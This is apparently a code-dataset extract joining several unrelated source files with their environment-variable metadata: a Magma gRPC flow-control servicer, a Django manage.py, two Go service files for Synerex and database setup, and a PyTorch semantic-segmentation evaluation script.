imsi, ip_addr, apn_ambr, static_rule_ids, dynamic_rules)
# TODO ?? Should the enforcement failure be reported per imsi session
_report_enforcement_failures(enforcement_res, imsi)
return enforcement_res
def _activate_rules_in_gy(self, imsi: str, ip_addr: IPAddress,
apn_ambr: AggregatedMaximumBitrate,
static_rule_ids: List[str],
dynamic_rules: List[PolicyRule]
) -> ActivateFlowsResult:
gy_res = self._gy_app.activate_rules(imsi, ip_addr, apn_ambr, static_rule_ids,
dynamic_rules)
# TODO: add metrics
return gy_res
def DeactivateFlows(self, request, context):
"""
Deactivate flows for a subscriber
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
self._loop.call_soon_threadsafe(self._deactivate_flows, request)
return DeactivateFlowsResult()
def _deactivate_flows(self, request):
"""
Deactivate flows for ipv4 / ipv6 or both
CWF won't have an ip_addr passed
"""
if self._service_config['setup_type'] == 'CWF' or request.ip_addr:
ipv4 = convert_ipv4_str_to_ip_proto(request.ip_addr)
if request.request_origin.type == RequestOriginType.GX:
self._deactivate_flows_gx(request, ipv4)
else:
self._deactivate_flows_gy(request, ipv4)
if request.ipv6_addr:
ipv6 = convert_ipv6_bytes_to_ip_proto(request.ipv6_addr)
self._update_ipv6_prefix_store(request.ipv6_addr)
if request.request_origin.type == RequestOriginType.GX:
self._deactivate_flows_gx(request, ipv6)
else:
self._deactivate_flows_gy(request, ipv6)
def _deactivate_flows_gx(self, request, ip_address: IPAddress):
logging.debug('Deactivating GX flows for %s', request.sid.id)
if request.rule_ids:
for rule_id in request.rule_ids:
self._service_manager.session_rule_version_mapper \
.update_version(request.sid.id, ip_address,
rule_id)
else:
# If no rule ids are given, all flows are deactivated
self._service_manager.session_rule_version_mapper.update_version(
request.sid.id, ip_address)
if request.remove_default_drop_flows:
self._enforcement_stats.deactivate_default_flow(request.sid.id,
ip_address)
self._enforcer_app.deactivate_rules(request.sid.id, ip_address,
request.rule_ids)
def _deactivate_flows_gy(self, request, ip_address: IPAddress):
logging.debug('Deactivating GY flows for %s', request.sid.id)
# Only deactivate requested rules here to not affect GX
if request.rule_ids:
for rule_id in request.rule_ids:
self._service_manager.session_rule_version_mapper \
.update_version(request.sid.id, ip_address, rule_id)
self._gy_app.deactivate_rules(request.sid.id, ip_address,
request.rule_ids)
def GetPolicyUsage(self, request, context):
"""
Get policy usage stats
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementStatsController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
fut = Future()
self._loop.call_soon_threadsafe(
self._enforcement_stats.get_policy_usage, fut)
return fut.result()
# --------------------------
# IPFIX App
# --------------------------
def UpdateIPFIXFlow(self, request, context):
"""
Update IPFIX sampling record
"""
self._log_grpc_payload(request)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
# Install trace flow
self._loop.call_soon_threadsafe(
self._ipfix_app.add_ue_sample_flow, request.sid.id,
request.msisdn, request.ap_mac_addr, request.ap_name,
request.pdp_start_time)
resp = FlowResponse()
return resp
# --------------------------
# DPI App
# --------------------------
def CreateFlow(self, request, context):
"""
Add dpi flow
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
DPIController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
self._loop.call_soon_threadsafe(self._dpi_app.add_classify_flow,
request.match, request.state,
request.app_name, request.service_type)
return resp
def RemoveFlow(self, request, context):
"""
Add dpi flow
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
DPIController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
self._loop.call_soon_threadsafe(self._dpi_app.remove_classify_flow,
request.match)
return resp
def UpdateFlowStats(self, request, context):
"""
Update stats for a flow
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
DPIController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
return resp
# --------------------------
# UE MAC App
# --------------------------
def SetupUEMacFlows(self, request, context) -> SetupFlowsResult:
"""
Activate a list of attached UEs
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
UEMacAddressController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
ret = self._ue_mac_app.is_ready_for_restart_recovery(request.epoch)
if ret != SetupFlowsResult.SUCCESS:
return SetupFlowsResult(result=ret)
fut = Future()
self._loop.call_soon_threadsafe(self._setup_ue_mac,
request, fut)
return fut.result()
def _setup_ue_mac(self, request: SetupUEMacRequest,
fut: 'Future(SetupFlowsResult)'
) -> SetupFlowsResult:
res = self._ue_mac_app.handle_restart(request.requests)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
for req in request.requests:
self._ipfix_app.add_ue_sample_flow(req.sid.id, req.msisdn,
req.ap_mac_addr,
req.ap_name,
req.pdp_start_time)
fut.set_result(res)
def AddUEMacFlow(self, request, context):
"""
Associate UE MAC address to subscriber
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
UEMacAddressController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
# 12 hex characters + 5 colons
if len(request.mac_addr) != 17:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details('Invalid UE MAC address provided')
return None
fut = Future()
self._loop.call_soon_threadsafe(self._add_ue_mac_flow, request, fut)
return fut.result()
def _add_ue_mac_flow(self, request, fut: 'Future(FlowResponse)'):
res = self._ue_mac_app.add_ue_mac_flow(request.sid.id, request.mac_addr)
fut.set_result(res)
def DeleteUEMacFlow(self, request, context):
"""
Delete UE MAC address to subscriber association
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
UEMacAddressController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
# 12 hex characters + 5 colons
if len(request.mac_addr) != 17:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details('Invalid UE MAC address provided')
return None
self._loop.call_soon_threadsafe(
self._ue_mac_app.delete_ue_mac_flow,
request.sid.id, request.mac_addr)
if self._service_manager.is_app_enabled(CheckQuotaController.APP_NAME):
self._loop.call_soon_threadsafe(
self._check_quota_app.remove_subscriber_flow, request.sid.id)
if self._service_manager.is_app_enabled(VlanLearnController.APP_NAME):
self._loop.call_soon_threadsafe(
self._vlan_learn_app.remove_subscriber_flow, request.sid.id)
if self._service_manager.is_app_enabled(TunnelLearnController.APP_NAME):
self._loop.call_soon_threadsafe(
self._tunnel_learn_app.remove_subscriber_flow, request.mac_addr)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
# Delete trace flow
self._loop.call_soon_threadsafe(
self._ipfix_app.delete_ue_sample_flow, request.sid.id)
resp = FlowResponse()
return resp
# --------------------------
# Check Quota App
# --------------------------
def SetupQuotaFlows(self, request, context) -> SetupFlowsResult:
"""
Activate a list of quota rules
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
CheckQuotaController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
ret = self._check_quota_app.is_ready_for_restart_recovery(request.epoch)
if ret != SetupFlowsResult.SUCCESS:
return SetupFlowsResult(result=ret)
fut = Future()
self._loop.call_soon_threadsafe(self._setup_quota,
request, fut)
return fut.result()
def _setup_quota(self, request: SetupQuotaRequest,
fut: 'Future(SetupFlowsResult)'
) -> SetupFlowsResult:
res = self._check_quota_app.handle_restart(request.requests)
fut.set_result(res)
def UpdateSubscriberQuotaState(self, request, context):
"""
Updates the subcsciber quota state
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
CheckQuotaController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
resp = FlowResponse()
self._loop.call_soon_threadsafe(
self._check_quota_app.update_subscriber_quota_state, request.updates)
return resp
# --------------------------
# Debugging
# --------------------------
def GetAllTableAssignments(self, request, context):
"""
Get the flow table assignment for all apps ordered by main table number
and name
"""
self._log_grpc_payload(request)
table_assignments = self._service_manager.get_all_table_assignments()
return AllTableAssignments(table_assignments=[
TableAssignment(app_name=app_name, main_table=tables.main_table,
scratch_tables=tables.scratch_tables) for
app_name, tables in table_assignments.items()])
# --------------------------
# Internal
# --------------------------
def _log_grpc_payload(self, grpc_request):
if not grpc_request:
return
indent = ' '
dbl_indent = indent + indent
indented_text = dbl_indent + \
str(grpc_request).replace('\n', '\n' + dbl_indent)
log_msg = 'Got RPC payload:\n{0}{1} {{\n{2}\n{0}}}'.format(indent,
grpc_request.DESCRIPTOR.name, indented_text.rstrip())
grpc_msg_queue.put(log_msg)
if grpc_msg_queue.qsize() > 100:
grpc_msg_queue.get()
if not self._print_grpc_payload:
return
logging.info(log_msg)
def _retrieve_failed_results(activate_flow_result: ActivateFlowsResult
) -> Tuple[List[RuleModResult],
List[RuleModResult]]:
failed_static_rule_results = \
[result for result in activate_flow_result.static_rule_results
if result.result == RuleModResult.FAILURE]
failed_dynamic_rule_results = \
[result for result in
activate_flow_result.dynamic_rule_results if
result.result == RuleModResult.FAILURE]
return failed_static_rule_results, failed_dynamic_rule_results
def _filter_failed_static_rule_ids(request: ActivateFlowsRequest,
failed_results: List[RuleModResult]
) -> List[str]:
failed_static_rule_ids = [result.rule_id for result in failed_results]
return [rule_id for rule_id in request.rule_ids if
rule_id not in failed_static_rule_ids]
def _filter_failed_dynamic_rules(request: ActivateFlowsRequest,
failed_results: List[RuleModResult]
) -> List[PolicyRule]:
failed_dynamic_rule_ids = [result.rule_id for result in failed_results]
return [rule for rule in request.dynamic_rules if
rule.id not in failed_dynamic_rule_ids]
def _report_enforcement_failures(activate_flow_result: ActivateFlowsResult,
imsi: str):
rule_results = chain(activate_flow_result.static_rule_results,
activate_flow_result.dynamic_rule_results)
for result in rule_results:
if result.result == RuleModResult.SUCCESS:
continue
ENFORCEMENT_RULE_INSTALL_FAIL.labels(rule_id=result.rule_id,
imsi=imsi).inc()
def _report_enforcement_stats_failures(
activate_flow_result: ActivateFlowsResult,
imsi: str):
rule_results = chain(activate_flow_result.static_rule_results,
activate_flow_result.dynamic_rule_results)
for result in rule_results:
if result.result == RuleModResult.SUCCESS:
continue
ENFORCEMENT_STATS_RULE_INSTALL_FAIL.labels(rule_id=result.rule_id,
imsi=imsi).inc()
|
[] |
[] |
[
"MAGMA_PRINT_GRPC_PAYLOAD"
] |
[]
|
["MAGMA_PRINT_GRPC_PAYLOAD"]
|
python
| 1 | 0 | |
server/gaiaApi/manage.py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gaiaApi.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
provider/pod-manager/pod-manager.go
|
package main
import (
"flag"
"fmt"
"log"
"os"
"sync"
"time"
"github.com/google/uuid"
api "github.com/synerex/synerex_alpha/api"
napi "github.com/synerex/synerex_alpha/nodeapi"
"github.com/synerex/synerex_alpha/provider/simutil"
"github.com/synerex/synerex_alpha/util"
"google.golang.org/grpc"
)
var (
myProvider *api.Provider
synerexAddr string
nodeIdAddr string
port string
startFlag bool
masterClock int
workerHosts []string
mu sync.Mutex
simapi *api.SimAPI
//providerManager *Manager
pm *simutil.ProviderManager
logger *util.Logger
waiter *api.Waiter
)
func init() {
waiter = api.NewWaiter()
startFlag = false
masterClock = 0
workerHosts = make([]string, 0)
logger = util.NewLogger()
flag.Parse()
//providerManager = NewManager()
synerexAddr = os.Getenv("SYNEREX_SERVER")
if synerexAddr == "" {
synerexAddr = "127.0.0.1:10000"
}
nodeIdAddr = os.Getenv("NODEID_SERVER")
if nodeIdAddr == "" {
nodeIdAddr = "127.0.0.1:9000"
}
port = os.Getenv("PORT")
if port == "" {
port = "9990"
}
}
////////////////////////////////////////////////////////////
//////////// Demand Supply Callback ////////////////
///////////////////////////////////////////////////////////
// Supplyのコールバック関数
func supplyCallback(clt *api.SMServiceClient, sp *api.Supply) {
}
// Demandのコールバック関数
func demandCallback(clt *api.SMServiceClient, dm *api.Demand) {
//tid := dm.GetSimDemand().GetSenderId()
//pid := myProvider.Id
// check if supply is match with my demand.
switch dm.GetSimDemand().GetType() {
case api.DemandType_CREATE_POD_REQUEST:
// providerを追加する
cpr := dm.GetSimDemand().GetCreatePodRequest()
fmt.Printf("get CreatePodRequest %v\n", cpr)
// 登録完了通知
senderInfo := myProvider.Id
targets := []uint64{dm.GetSimDemand().GetSenderId()}
msgId := dm.GetSimDemand().GetMsgId()
simapi.CreatePodResponse(senderInfo, targets, msgId)
logger.Info("Finish: Create Pod")
case api.DemandType_DELETE_POD_REQUEST:
// providerを追加する
cpr := dm.GetSimDemand().GetDeletePodRequest()
fmt.Printf("get DeletePodRequest %v\n", cpr)
// 登録完了通知
senderInfo := myProvider.Id
targets := []uint64{dm.GetSimDemand().GetSenderId()}
msgId := dm.GetSimDemand().GetMsgId()
simapi.DeletePodResponse(senderInfo, targets, msgId)
logger.Info("Finish: Delete Pod")
}
}
func main() {
// ProviderManager
uid, _ := uuid.NewRandom()
myProvider = &api.Provider{
Id: uint64(uid.ID()),
Name: "PodManager",
Type: api.ProviderType_MASTER,
}
pm = simutil.NewProviderManager(myProvider)
// Connect to Node Server
nodeapi := napi.NewNodeAPI()
for {
err := nodeapi.RegisterNodeName(nodeIdAddr, "PodManager", false)
if err == nil {
logger.Info("connected NodeID server!")
go nodeapi.HandleSigInt()
nodeapi.RegisterDeferFunction(nodeapi.UnRegisterNode)
break
} else {
logger.Warn("NodeID Error... reconnecting...")
time.Sleep(2 * time.Second)
}
}
// Connect to Synerex Server
var opts []grpc.DialOption
opts = append(opts, grpc.WithInsecure())
conn, err := grpc.Dial(synerexAddr, opts...)
if err != nil {
log.Fatalf("fail to dial: %v", err)
}
nodeapi.RegisterDeferFunction(func() { conn.Close() })
client := api.NewSynerexClient(conn)
argJson := fmt.Sprintf("{Client:PodManager}")
// api
fmt.Printf("client: %v\n", client)
simapi = api.NewSimAPI()
simapi.RegistClients(client, myProvider.Id, argJson) // channelごとのClientを作成
simapi.SubscribeAll(demandCallback, supplyCallback) // ChannelにSubscribe*/
logger.Info("Connected Synerex Server!\n")
wg := sync.WaitGroup{}
wg.Add(1)
wg.Wait()
nodeapi.CallDeferFunctions() // cleanup!
}
|
[
"\"SYNEREX_SERVER\"",
"\"NODEID_SERVER\"",
"\"PORT\""
] |
[] |
[
"SYNEREX_SERVER",
"PORT",
"NODEID_SERVER"
] |
[]
|
["SYNEREX_SERVER", "PORT", "NODEID_SERVER"]
|
go
| 3 | 0 | |
configs/container/secondaryadapterscontainer.go
|
package container
import (
"github.com/raulinoneto/transactions-routines/internal/secondary/persistence"
"github.com/raulinoneto/transactions-routines/internal/secondary/rx"
"github.com/raulinoneto/transactions-routines/pkg/domains/transactions"
"os"
)
func (c *Container) GetMySqlAdapter() *persistence.MySqlAdapter {
if c.mySqlAdapter == nil {
c.mySqlAdapter = persistence.NewMySqlAdapter(
os.Getenv("DB_ADAPTER"),
os.Getenv("DB_USER"),
os.Getenv("DB_PASSWORD"),
os.Getenv("DB_ADDR"),
os.Getenv("DB_PORT"),
os.Getenv("DB_NAME"),
)
c.mySqlAdapter.TestConnection()
}
return c.mySqlAdapter
}
func (c *Container) GetAccountMySqlAdapter() persistence.AccountAdapter {
if c.accountMySqlAdapter == nil {
c.accountMySqlAdapter = persistence.NewAccountMySqlAdapter(c.GetMySqlAdapter())
}
return c.accountMySqlAdapter
}
func (c *Container) GetTransactionsMySqlAdapter() transactions.TransactionRepository {
if c.transactionsMySqlAdapter == nil {
c.transactionsMySqlAdapter = persistence.NewTransactionsMySqlAdapter(c.GetMySqlAdapter())
}
return c.transactionsMySqlAdapter
}
func (c *Container) GetTransactionsObserverAdapter() *rx.TransactionsObserverAdapter {
if c.transactionObserver == nil {
c.transactionObserver = rx.NewTransactionsObserverAdapter()
}
return c.transactionObserver
}
|
[
"\"DB_ADAPTER\"",
"\"DB_USER\"",
"\"DB_PASSWORD\"",
"\"DB_ADDR\"",
"\"DB_PORT\"",
"\"DB_NAME\""
] |
[] |
[
"DB_PASSWORD",
"DB_ADAPTER",
"DB_PORT",
"DB_ADDR",
"DB_NAME",
"DB_USER"
] |
[]
|
["DB_PASSWORD", "DB_ADAPTER", "DB_PORT", "DB_ADDR", "DB_NAME", "DB_USER"]
|
go
| 6 | 0 | |
src/semseg/tool/test.py
|
import os
import time
import logging
import argparse
import cv2
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import torch.nn.parallel
import torch.utils.data
from util import dataset, transform, config
from util.util import AverageMeter, intersectionAndUnion, check_makedirs, colorize
cv2.ocl.setUseOpenCL(False)
from collections import namedtuple
Label = namedtuple( 'Label' , [
'name' , # The identifier of this label, e.g. 'car', 'person', ... .
# We use them to uniquely name a class
'id' , # An integer ID that is associated with this label.
# The IDs are used to represent the label in ground truth images
# An ID of -1 means that this label does not have an ID and thus
# is ignored when creating ground truth images (e.g. license plate).
# Do not modify these IDs, since exactly these IDs are expected by the
# evaluation server.
'trainId' , # Feel free to modify these IDs as suitable for your method. Then create
# ground truth images with train IDs, using the tools provided in the
# 'preparation' folder. However, make sure to validate or submit results
# to our evaluation server using the regular IDs above!
# For trainIds, multiple labels might have the same ID. Then, these labels
# are mapped to the same class in the ground truth images. For the inverse
# mapping, we use the label that is defined first in the list below.
# For example, mapping all void-type classes to the same ID in training,
# might make sense for some approaches.
# Max value is 255!
'category' , # The name of the category that this label belongs to
'categoryId' , # The ID of this category. Used to create ground truth images
# on category level.
'hasInstances', # Whether this label distinguishes between single instances or not
'ignoreInEval', # Whether pixels having this class as ground truth label are ignored
# during evaluations or not
'color' , # The color of this label
] )
labels = [
# name id trainId category catId hasInstances ignoreInEval color
Label( 'unlabeled' , 0 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'ego vehicle' , 1 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'rectification border' , 2 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'out of roi' , 3 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'static' , 4 , 255 , 'void' , 0 , False , True , ( 0, 0, 0) ),
Label( 'dynamic' , 5 , 255 , 'void' , 0 , False , True , (111, 74, 0) ),
Label( 'ground' , 6 , 255 , 'void' , 0 , False , True , ( 81, 0, 81) ),
Label( 'road' , 7 , 0 , 'flat' , 1 , False , False , (128, 64,128) ),
Label( 'sidewalk' , 8 , 1 , 'flat' , 1 , False , False , (244, 35,232) ),
Label( 'parking' , 9 , 255 , 'flat' , 1 , False , True , (250,170,160) ),
Label( 'rail track' , 10 , 255 , 'flat' , 1 , False , True , (230,150,140) ),
Label( 'building' , 11 , 2 , 'construction' , 2 , False , False , ( 70, 70, 70) ),
Label( 'wall' , 12 , 3 , 'construction' , 2 , False , False , (102,102,156) ),
Label( 'fence' , 13 , 4 , 'construction' , 2 , False , False , (190,153,153) ),
Label( 'guard rail' , 14 , 255 , 'construction' , 2 , False , True , (180,165,180) ),
Label( 'bridge' , 15 , 255 , 'construction' , 2 , False , True , (150,100,100) ),
Label( 'tunnel' , 16 , 255 , 'construction' , 2 , False , True , (150,120, 90) ),
Label( 'pole' , 17 , 5 , 'object' , 3 , False , False , (153,153,153) ),
Label( 'polegroup' , 18 , 255 , 'object' , 3 , False , True , (153,153,153) ),
Label( 'traffic light' , 19 , 6 , 'object' , 3 , False , False , (250,170, 30) ),
Label( 'traffic sign' , 20 , 7 , 'object' , 3 , False , False , (220,220, 0) ),
Label( 'vegetation' , 21 , 8 , 'nature' , 4 , False , False , (107,142, 35) ),
Label( 'terrain' , 22 , 9 , 'nature' , 4 , False , False , (152,251,152) ),
Label( 'sky' , 23 , 10 , 'sky' , 5 , False , False , ( 70,130,180) ),
Label( 'person' , 24 , 11 , 'human' , 6 , True , False , (220, 20, 60) ),
Label( 'rider' , 25 , 12 , 'human' , 6 , True , False , (255, 0, 0) ),
Label( 'car' , 26 , 13 , 'vehicle' , 7 , True , False , ( 0, 0,142) ),
Label( 'truck' , 27 , 14 , 'vehicle' , 7 , True , False , ( 0, 0, 70) ),
Label( 'bus' , 28 , 15 , 'vehicle' , 7 , True , False , ( 0, 60,100) ),
Label( 'caravan' , 29 , 255 , 'vehicle' , 7 , True , True , ( 0, 0, 90) ),
Label( 'trailer' , 30 , 255 , 'vehicle' , 7 , True , True , ( 0, 0,110) ),
Label( 'train' , 31 , 16 , 'vehicle' , 7 , True , False , ( 0, 80,100) ),
Label( 'motorcycle' , 32 , 17 , 'vehicle' , 7 , True , False , ( 0, 0,230) ),
Label( 'bicycle' , 33 , 18 , 'vehicle' , 7 , True , False , (119, 11, 32) ),
Label( 'license plate' , -1 , -1 , 'vehicle' , 7 , False , True , ( 0, 0,142) ),
]
trainid2id = {label.trainId: label.id for label in labels}
def get_parser():
parser = argparse.ArgumentParser(description='PyTorch Semantic Segmentation')
parser.add_argument('--config', type=str, default='config/ade20k/ade20k_pspnet50.yaml', help='config file')
parser.add_argument('opts', help='see config/ade20k/ade20k_pspnet50.yaml for all options', default=None, nargs=argparse.REMAINDER)
args = parser.parse_args()
assert args.config is not None
cfg = config.load_cfg_from_cfg_file(args.config)
if args.opts is not None:
cfg = config.merge_cfg_from_list(cfg, args.opts)
return cfg
def get_logger():
logger_name = "main-logger"
logger = logging.getLogger(logger_name)
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
fmt = "[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s"
handler.setFormatter(logging.Formatter(fmt))
logger.addHandler(handler)
return logger
def check(args):
assert args.classes > 1
assert args.zoom_factor in [1, 2, 4, 8]
assert args.split in ['train', 'val', 'test']
if args.arch == 'psp':
assert (args.train_h - 1) % 8 == 0 and (args.train_w - 1) % 8 == 0
elif args.arch == 'psa':
if args.compact:
args.mask_h = (args.train_h - 1) // (8 * args.shrink_factor) + 1
args.mask_w = (args.train_w - 1) // (8 * args.shrink_factor) + 1
else:
assert (args.mask_h is None and args.mask_w is None) or (args.mask_h is not None and args.mask_w is not None)
if args.mask_h is None and args.mask_w is None:
args.mask_h = 2 * ((args.train_h - 1) // (8 * args.shrink_factor) + 1) - 1
args.mask_w = 2 * ((args.train_w - 1) // (8 * args.shrink_factor) + 1) - 1
else:
assert (args.mask_h % 2 == 1) and (args.mask_h >= 3) and (
args.mask_h <= 2 * ((args.train_h - 1) // (8 * args.shrink_factor) + 1) - 1)
assert (args.mask_w % 2 == 1) and (args.mask_w >= 3) and (
args.mask_w <= 2 * ((args.train_h - 1) // (8 * args.shrink_factor) + 1) - 1)
elif args.arch == 'deeplabv2' or 'psptrans':
pass
else:
raise Exception('architecture not supported yet'.format(args.arch))
import subprocess
# operations for polyaxon
def polyaxon_data_prepare():
from polyaxon_client.tracking import get_data_paths, get_outputs_refs_paths, get_outputs_path
# fetch data to job pods
sync_dest_dir = fetch_data_from_ssd()
#print("sync_dest_dir")
#print(sync_dest_dir)
# os.system('ls ' + sync_dest_dir + '/cityscapes')
args.data_root = os.path.join(sync_dest_dir, args.data_root)
# args.train_list = os.path.join(sync_dest_dir, args.train_list)
# args.train_labeled_list = os.path.join(sync_dest_dir, args.train_labeled_list)
# args.train_unlabeled_list = os.path.join(sync_dest_dir, args.train_unlabeled_list)
# args.unlabeled_list = os.path.join(sync_dest_dir, args.unlabeled_list)
args.val_list = os.path.join(sync_dest_dir, args.val_list)
args.test_list = os.path.join(sync_dest_dir, args.test_list)
outputpath = get_outputs_path()
#os.system('ls ' + outputpath)
#print(outputpath)
import sys
# sys.exit("debug output path")
# set output result path
# args.save_path = os.path.join(get_outputs_path(), args.save_path.replace('..', 'output'))
args.save_path = os.path.join(get_outputs_path(), args.save_path)
args.save_folder = os.path.join(get_outputs_path(), args.save_folder)
args.model_path = os.path.join(get_outputs_path(), args.model_path)
# args.result_path = os.path.join(get_outputs_path(), args.result_path.replace('..', 'output'))
# args.tensorboard_path = os.path.join(get_outputs_path(), args.tensorboard_path.replace('..', 'output'))
cmd_line = "mkdir -p {0}".format(args.save_path)
subprocess.call(cmd_line.split())
#
cmd_line = "mkdir -p {0}".format(args.save_folder)
subprocess.call(cmd_line.split())
# # copy file to save as backup
subprocess.call(
"cp tool/my_train2.sh tool/my_train2.py tool/test.py config/cityscapes/config.yaml {0}".format(args.save_path).split())
# subprocess.call("cp -r utils models {0}".format(args.result_path + '/../').split())
# cmd_line = "mkdir -p {0}".format(args.tensorboard_path)
# subprocess.call(cmd_line.split())
def fetch_data_from_ssd():
from polyaxon_client.tracking import get_data_paths, get_outputs_refs_paths, get_outputs_path
source_data = 'wubowen/' + args.data_root
sync_source_dir = os.path.join(get_data_paths()['ssd20'], source_data)
sync_dest_dir = os.path.join(get_data_paths()['host-path'], os.path.dirname(source_data))
# if not os.path.exists(sync_dest_dir):
cmd_line = "mkdir -p {0}".format(sync_dest_dir)
subprocess.call(cmd_line.split())
# data_dir = os.path.join(get_data_paths()['host-path'], source_data)
# if not os.path.exists(data_dir):
cmd_line = "rsync -r {0} {1}".format(sync_source_dir, sync_dest_dir)
subprocess.call(cmd_line.split())
return sync_dest_dir
def local_data_prepare():
args.data_root = os.path.join(args.local_prefix, args.data_root)
args.train_list = os.path.join(args.local_prefix, args.train_list)
args.val_list = os.path.join(args.local_prefix, args.val_list)
args.test_list = os.path.join(args.local_prefix, args.test_list)
def main():
global args, logger
args = get_parser()
check(args)
# if args.polyaxon:
# polyaxon_data_prepare()
# else:
local_data_prepare()
logger = get_logger()
os.environ["CUDA_VISIBLE_DEVICES"] = ','.join(str(x) for x in args.test_gpu)
logger.info(args)
logger.info("=> creating model ...")
logger.info("Classes: {}".format(args.classes))
value_scale = 255
mean = [0.485, 0.456, 0.406]
mean = [item * value_scale for item in mean]
std = [0.229, 0.224, 0.225]
std = [item * value_scale for item in std]
gray_folder = os.path.join(args.save_folder, 'gray')
color_folder = os.path.join(args.save_folder, 'color')
test_transform = transform.Compose([transform.ToTensor()])
test_data = dataset.SemData(split=args.split, data_root=args.data_root, data_list=args.test_list, transform=test_transform)
index_start = args.index_start
if args.index_step == 0:
index_end = len(test_data.data_list)
else:
index_end = min(index_start + args.index_step, len(test_data.data_list))
test_data.data_list = test_data.data_list[index_start:index_end]
test_loader = torch.utils.data.DataLoader(test_data, batch_size=1, shuffle=False, num_workers=args.workers, pin_memory=True)
colors = np.loadtxt(args.colors_path).astype('uint8')
names = [line.rstrip('\n') for line in open(args.names_path)]
if not args.has_prediction:
if args.arch == 'psp':
from model.pspnet import PSPNet
model = PSPNet(layers=args.layers, classes=args.classes, zoom_factor=args.zoom_factor, pretrained=False, concatenate=args.concatenate)
elif args.arch == 'psptrans':
from model.psptrans import PSPNet
model = PSPNet(layers=args.layers, classes=args.classes, zoom_factor=args.zoom_factor, pretrained=False)
elif args.arch == 'psa':
from model.psanet import PSANet
model = PSANet(layers=args.layers, classes=args.classes, zoom_factor=args.zoom_factor, compact=args.compact,
shrink_factor=args.shrink_factor, mask_h=args.mask_h, mask_w=args.mask_w,
normalization_factor=args.normalization_factor, psa_softmax=args.psa_softmax,
pretrained=False)
elif args.arch == 'deeplabv2':
from model.deeplabv2 import Resnet101_deeplab
print("args.pretrain data=" + args.pretrain_data)
# import ipdb; ipdb.set_trace(context=20)
model = Resnet101_deeplab(num_classes=args.classes, pretrained=True,
pretrain_data=args.pretrain_data)
modules_ori = model.pretrained_layers()
modules_new = model.new_layers()
# logger.info(model)
model = torch.nn.DataParallel(model).cuda()
cudnn.benchmark = True
if os.path.isfile(args.model_path):
logger.info("=> loading checkpoint '{}'".format(args.model_path))
checkpoint = torch.load(args.model_path)
model.load_state_dict(checkpoint['state_dict'], strict=False)
logger.info("=> loaded checkpoint '{}'".format(args.model_path))
else:
raise RuntimeError("=> no checkpoint found at '{}'".format(args.model_path))
# if args.test_adabn:
# target_transform = transform.Compose([
# # target_transform = Compose([
# transform.RandScale([args.scale_min, args.scale_max]),
# transform.RandRotate([args.rotate_min, args.rotate_max], padding=mean, ignore_label=args.ignore_label),
# transform.RandomGaussianBlur(),
# transform.RandomHorizontalFlip(),
# transform.Crop([args.train_h, args.train_w], crop_type='rand', padding=mean,
# ignore_label=args.ignore_label),
# transform.ToTensor(),
# transform.Normalize(mean=mean, std=std)])
# target_ds = dataset.SemData(split='train', data_root=args.data_root,
# data_list=args.train_labeled_list,
# transform=target_transform)
# target_sampler = None
# target_loader = torch.utils.data.DataLoader(target_ds, batch_size=args.batch_size_adabn,
# shuffle=(target_sampler is None),
# num_workers=args.workers, pin_memory=True,
# sampler=target_sampler,
# drop_last=True)
# from util.reader import DataReader
# reader = DataReader(target_loader)
# adabn(model, reader=reader, iterations=1000, args=args)
test(test_loader, test_data.data_list, model, args.classes, mean, std, args.base_size, args.test_h, args.test_w, args.scales, gray_folder, color_folder, colors)
if args.split != 'test':
cal_acc(test_data.data_list, gray_folder, args.classes, names)
print(args.model_path)
print('\n')
print('\n')
